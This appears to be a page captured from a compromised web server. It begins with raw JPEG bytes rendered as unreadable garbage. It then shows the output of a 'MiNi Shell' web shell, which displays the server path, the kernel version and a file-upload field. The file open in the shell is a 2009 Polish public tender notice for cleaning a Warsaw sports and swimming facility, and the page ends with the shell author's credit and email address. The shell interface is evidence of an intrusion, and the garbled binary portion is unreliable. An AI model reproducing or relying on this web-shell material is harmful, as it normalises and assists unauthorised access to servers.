JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090106/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090106/5171-N-2009.html

<p class="kh_header"><b>Warszawa: Sprzątanie obiektu rekreacyjno-sportowego przy ul. Jagiellońskiej 7 w Warszawie</b><br>
<b>Numer ogłoszenia: 5171 - 2009; data zamieszczenia: 06.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dzielnicowy Ośrodek Sportu i Rekreacji Dzielnicy Praga Północ m.st. Warszawy , ul. Szanajcy 17/19, 03-481 Warszawa, woj. mazowieckie, tel. 022 6195031, faks 022 6191120.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dosir.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie obiektu rekreacyjno-sportowego przy ul. Jagiellońskiej 7 w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje prace związane z utrzymaniem czystości w obiekcie
      rekreacyjno - sportowym położonym przy ul. Jagiellońskiej 7 w Warszawie wraz z 
      dostarczeniem materiałów i urządzeń do tego celu oraz zabezpieczanie w art.    
      czystościowe pomieszczeń sanitarnych ( papier toaletowy, żel pod prysznic, mydło przy 
      umywalkach, ręczniki składane, worki na śmieci), jak również środki do zimowego
      utrzymania zewnętrznego terenu obiektu.
      Obiekt o powierzchni około 6,5 tys. m2 ( w tym 568 m2 powierzchni basenów ) oraz 
      4,8  tys. m2    terenu zewnętrznego administrowany jest przez Dzielnicowy Ośrodek Sportu 
      i Rekreacji Dzielnicy Praga Północ m.st. Warszawy z siedzibą przy ul. Szanajcy 17/19 w 
      Warszawie. W skład w/w obiektu wchodzi basen, basen rekreacyjny, jakuzzi, zjeżdżalnia, 
      hala sportowa z profesjonalną nawierzchnią (parkiet drewniany), centrum odnowy 
      biologicznej (sauny, solaria) zaplecze techniczne z profesjonalnymi urządzeniami,
      pomieszczenia biurowe i sanitarne oraz teren zewnętrzny. Obiekt czynny jest dla klientów 
      7 dni w tygodniu w godzinach 6,30 - 22,00. Zamawiający wymaga  
      następującego składu personalnego poszczególnych zmian serwisowych: 
-	zmiana poranna: 6,00 - 14,00 -  2 osoby mężczyzna i kobieta przez 7 dni w tygodniu
-	zmiana popołudniowa: 14,00 - 22,00 -  2 osoby mężczyzna i kobieta przez 7 dni w tygodniu,
-	zmiana nocna: 22,00 - 6,00 odpowiednia ilość pracowników zapewniająca zrealizowanie zakresu prac związanych z generalnym sprzątaniem obiektu przez 7 dni w tygodniu.
      Uwaga: generalne  sprzątanie obiektu odbywa się poza  godzinami otwarcia obiektu. 
      Obiekt podlega ścisłej kontroli Wojewódzkiej   Stacji Sanitarno - Epidemiologicznej.   
Szczegółowy zakres robót, wymagania materiałowe i warunki wykonania określa  - 
      Zakres prac i częstotliwość wykonywania robót obowiązujących przy sprzątaniu obiektu  
         rekreacyjno - sportowego przy ul. Jagiellońskiej 7, który   
         jest   integralną częścią Specyfikacji Istotnych Warunków  Zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 74.73.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 5000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki :
     1)  nie podlegają wykluczeniu na podstawie art .24 ust 1 i ust. 2 i spełniają warunki 
           zawarte w art. 22 ust.1 pkt 1, 2, 3, 4  ustawy Prawo zamówień publicznych ,   
     2) są uprawnieni do występowania w obrocie prawnym w zakresie objętym 
          przedmiotem zamówienia. 
     3) wniosą wadium w wymaganej wysokości,
     4) Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego  i osób zdolnych do wykonania zamówienia a mianowicie:
     	a)  potencjał techniczny tj. minimum :
           - dwa odkurzacze podwodne do codziennego czyszczenia dna i ścian basenów,    
           -  jeden agregat do dezynfekcji parą,
-  4 profesjonalne wózki serwisowe,
 -  jedna maszyna szorująca dwubiegowa z wytwornicą piany,            
 -  jeden odkurzacz do pracy na sucho-mokro,
 -   jeden kombajn szorująco - zbierający,
 -   jeden zmechanizowany sprzęt do odśnieżania.
               Uwaga : Do wykazu sprzętu w przypadku dysponowania tylko ww minimalną 
               ilością sprzętu należy dołączyć  zobowiązanie o zabezpieczeniu na czas 
               ewentualnych awarii i napraw - sprzętu zastępczego,  gwarantującego płynność 
               sprzątania ,
           b) pracownicy tj. minimum 2 osoby przewidziane jako kierownik 
                i jego zastępca przeszkoleni w zakresie zasad eksploatacji basenów oraz   
                wymogów sanitarnych i przeciwepidemicznych obowiązujących na basenach 
                (szkolenie należy udokumentować stosownym zaświadczeniem) oraz pracowników 
    z aktualnymi badaniami na nosicielstwo, a także pracownicy uprawnieni do                  prac na wysokościach.   
c) niezbędna wiedza i doświadczenie zawodowe, tj. realizacja w ostatnich 
    trzech latach, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, zamówień o podobnym charakterze i stopniu złożoności, w tym co najmniej realizacja jednego zamówienia na całoroczną obsługę kompleksu sportowo- rekreacyjnego z basenem. (wykaz należy poświadczyć stosownymi 
                referencjami) 
     5)  wykazują się dobrą sytuacją ekonomiczną , a w szczególności:
            a)  znajdują  się w sytuacji finansowej zapewniającej wykonanie zamówienia 
                 określoną jako możliwość dostępu lub dysponowania środkami finansowymi 
             wystarczającymi do realizacji zamówienia przez okres minimum 2-ch miesięcy  na    
             warunkach określonych w projekcie umowy z uwzględnieniem zobowiązań z 
             tytułu realizacji innych zamówień, 
             b) posiadają ubezpieczenie od odpowiedzialności cywilnej za szkody związane z 
                 działalnością gospodarczą w wysokości minimum  1 000 000,00   zł oraz  
                 zobowiążą się do przedłużania posiadanego ubezpieczenia na okres trwania 
                 umowy z zachowaniem co najmniej warunków  aktualnego ubezpieczenia 
                 złożonego w ofercie, 
     6)  akceptują bez zastrzeżeń warunki umowy podane w załączonym projekcie umowy,         
     7)  złożą ofertę na zrealizowanie całości przedmiotu zamówienia , 
8)	złożą w wymaganym terminie ofertę zgodnie z wymaganiami zawartymi w ustawie  
      Prawo zamówień publicznych i Specyfikacji Istotnych Warunków Zamówienia ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dla uznania ważności oferta musi zawierać następujące dokumenty w formie oryginałów  
    lub ich kserokopii poświadczonych za zgodność z oryginałem przez osobę podpisującą  
    ofertę : 
1)	ofertę (wypełniony formularz),
2)	potwierdzenie wniesienia wadium.
3)	podpisany zakres prac i częstotliwość wykonywania robót ,
4)	wypełniony i podpisany druk - ustalenia wynagrodzenia Wykonawcy .  
    5)  wykaz materiałów przewidzianych do realizacji przedmiotu zamówienia  
6)	wykaz sprzętu przewidzianego do realizacji zamówienia ; 
7)	oświadczenie wynikające z postanowień art. 24 ust. 1 i ust. 2 i art. 22 ust. 1 pkt 1,2,3,4  pzp,
8)   aktualny dokument np. wypis / odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej potwierdzający dopuszczenie Wykonawcy do obrotu prawnego w zakresie objętym zamówieniem, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu  składania ofert. 
          Uwaga:
-	Aktualność dokumentów Wykonawca potwierdza podpisem z adnotacją dokument aktualny na dzień składania ofert,   
8)	aktualne zaświadczenie o braku zaległości podatkowych lub zaświadczenie o uzyskaniu przewidzianego prawem zwolnienia, odroczenia lub rozłożenia na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji z właściwego Urzędu Skarbowego wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
   10) aktualne zaświadczenie z właściwego Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego o braku  zaległości  w opłacaniu składek na ubezpieczenia społeczne i zdrowotne lub zaświadczenie o uzyskaniu przewidzianego prawem zwolnienia, odroczenia lub rozłożenia na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
   11)  aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w 
           art.24 ust. 1 pkt. 4 - 9 uzp na temat karalności Wykonawcy; w przypadku, gdy Wykonawca jest osobą prawną, informacje powinny dotyczyć 
wszystkich  urzędujących członków organu zarządzającego. Informacje powinny być   
           wydane nie wcześniej,  niż 6 miesięcy przed upływem terminu składania ofert,
           UWAGA:  Jeżeli Wykonawcą jest Wykonawca  będący jednostką organizacyjną nie 
  posiadającą osobowości  prawnej ( spółka cywilna ) lub podmiotami występującymi 
           wspólnie o uzyskanie zamówienia publicznego, oferta powinna zawierać : 
          -  ważny i aktualny  w  terminie związania ofertą i realizacją zamówienia publicznego 
            dokument, z którego wynika uprawnienie do złożenia oferty ( np. umowa spółki 
            cywilnej, umowa wspólnego przedsięwzięcia gospodarczego ),
         -  dokumenty  wymienione w punktach od 8 do 11  złożone przez wszystkie  podmioty 
            uczestniczące w wspólnym przedsięwzięciu gospodarczym 
  12) aktualną informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek  tj. wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową.
13)	 oświadczenie o sytuacji finansowej Wykonawcy za 2007 rok,  potwierdzone bilansem i rachunkiem wyników lub innymi dokumentami 
       przewidzianymi prawem a umożliwiającymi ocenę Wykonawcy.
  14) kserokopię ubezpieczenia od odpowiedzialności cywilnej w związku z  prowadzoną działalnością gospodarczą.
        Uwaga: Oświadczenie o przedłużaniu ubezpieczenia z chwilą upływu terminu 
   ważności w okresie świadczenia usługi, przynajmniej w wysokości kwoty ubezpieczenia      
   złożonego w ofercie, zawarte jest w treści druku oferty.
  15) wykaz  kadry kierowniczej bezpośrednio odpowiedzialnej za realizację robót będących 
         przedmiotem zamówienia wraz z  kserokopiami ukończonych szkoleń w zakresie 
         wymogów sanitarnych i przeciwepidemicznych związanych z utrzymywaniem czystości basenów kąpielowych i opisem doświadczenia w tej pracy oraz  listę  pracowników 
        przewidywaną do realizacji zamówienia ,
         Do wykazu należy dołączyć kserokopie książeczek zdrowia z aktualnymi badaniami na 
         nosicielstwo.
  16) wykaz  robót zrealizowanych przez Wykonawcę w okresie ostatnich trzech lat (a jeżeli okres działalności jest krótszy - w tym okresie) wraz z  referencjami i rekomendacjami,  
   17) projekt umowy uzupełniony danymi Wykonawcę , parafowany na każdej stronie oraz 
          podpisany jak oferta.
   18) potwierdzenie wizji lokalnej obiektu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.dosir.waw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Szanajcy 17/19, 03-481 Warszawa.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.01.2009 godzina 14:00, miejsce: ul.Szanajcy 17/19, 03-481 Warszawa.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com